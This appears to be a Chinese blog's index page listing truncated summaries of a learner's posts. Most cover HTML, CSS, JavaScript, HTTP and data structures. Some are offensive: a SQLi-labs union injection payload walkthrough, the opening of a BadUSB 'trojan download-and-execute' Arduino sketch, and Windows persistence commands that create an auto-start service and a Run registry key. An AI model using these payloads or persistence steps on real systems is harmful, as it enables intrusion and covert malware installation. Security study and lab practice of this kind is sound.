摘要:
Page1 less-1基于错误的GET单引号字符型注入 首先在末尾添加单引号 ?id=1' 报错 然后猜解列数 ?id=1 order by 1 --+ 正常 ?id=1 order by 4 --+ 报错 说明列数为3 联合查询 ?id=-1'union select 1,2,3--+ 回显 阅读全文
摘要:
SQL注入学习笔记 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 MYSQL 在MYSQL5.0以上版本中,存在一个 阅读全文
摘要:
数据结构基础 当前进度[P4] 课程链接:https://www.bilibili.com/video/BV1b7411N798 一、基本概念 数据: 数据是信息的载体,是描述客观事物属性的数、字符及所有能输入到计算机中并被计算机程序识别和处理的符号的集合。数据是计算机程序加工的原料。 数据结构、数 阅读全文
摘要:
CSS基础学习 当前进度[P78] 参考资料 视频链接:https://www.bilibili.com/video/BV14J4114768 菜鸟教程:https://www.runoob.com/css/css-tutorial.html 一、CSS简介 CSS的主要使用场景就是美化网页,布局页 阅读全文
摘要:
HTML 基础学习 参考资料 视频课程:https://www.bilibili.com/video/BV14J4114768 W3C文档:https://webplatform.github.io/docs/html/ W3Cschool:https://www.w3cschool.cn/html 阅读全文
摘要:
参考资料 视频链接:https://www.bilibili.com/video/BV1Sy4y1C7ha?spm_id_from=333.999.0.0 菜鸟教程:https://www.runoob.com/js/js-tutorial.html 视频目录: 当前进度【P187】 [x] 基础知 阅读全文
摘要:
Badusb常用代码整理 一、小马下载执行 适用于常见可执行文件 #include <Keyboard.h> void setup() { //初始化,这里的代码只执行一次 delay(5000); //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。 Keyboard.set_modi 阅读全文
摘要:
《Kali安全渗透测试实践教程》 第一章 Kali与靶机系统 第二章 常用安全工具 第三章 信息收集 《大话数据结构》 第一章 数据结构绪论 第二章 算法 P51 《图解HTTP》 第一章 了解web及网络基础 第二章 简单的http协议 第三章 http报文内的http信息 P57 《黑客免杀攻防 阅读全文
摘要:
HTTP请求: 请求行 请求行由三个标记组成:请求方法、请求 URL 和 HTTP 版本,它们用空格分享。 例如:GET /index.html HTTP/1.1 HTTP: 规划定义了 8 种可能的请求方法: GET:检索 URL 中标识资源的一个简单请求 HEAD:与 GET 方法相同,服务器只 阅读全文
摘要:
1、开机服务项 sc create Protect binpath= 目标路径 type= own start= auto displayname= 服务名称 2、注册表自启 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 阅读全文